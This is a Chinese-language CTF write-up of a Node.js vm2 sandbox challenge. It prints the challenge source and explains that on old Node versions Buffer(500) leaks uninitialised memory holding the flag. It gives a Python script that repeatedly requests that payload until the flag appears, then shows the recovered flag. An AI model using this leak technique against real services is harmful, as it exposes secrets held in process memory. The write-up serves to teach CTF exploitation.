访问题目地址

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});

简单分析可以看出是一道关于node.js沙箱逃逸的问题，首先定义变量 flag，然后可以在沙箱里面执行任意的命令，那问题是如何逃逸出去呢？
Google了一下：

这儿的环境是 8.0 之前的，所以我们使用 Buffer()来读取内存，这个和 Linux 读内存原理差不多
直接上EXP：

# encoding=utf-8

import requests
import time
url = 'http://your ip:port/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(response)
            break

拿到flag

flag{4nother_h34rtbleed_in_n0dejs}

思考：node.js沙箱逃逸的原理是甚么？